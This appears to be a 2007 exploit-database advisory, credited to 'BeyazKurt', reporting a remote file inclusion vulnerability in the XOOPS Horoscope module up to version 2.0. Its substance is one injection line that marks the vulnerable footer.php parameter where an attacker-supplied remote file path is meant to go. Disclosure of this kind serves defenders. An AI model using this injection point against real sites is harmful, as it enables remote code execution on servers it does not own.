id: 1945
date: 06/11/2007
title: XOOPS Module Horoscope <= 2.0 Remote File Inclusion Vulnerability
author: BeyazKurt
cves: 

=================================================================
XOOPS Module Horoscope <= 2.0 Remote File Inclusion Vulnerability
=================================================================



BeyazKurt 

XOOPS Modules Horoscope

http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162

modules/horoscope/footer.php?xoopsConfig[root_path]=

{NetLife Since : '2003-4'}



#  0day.today [2023-03-26]  #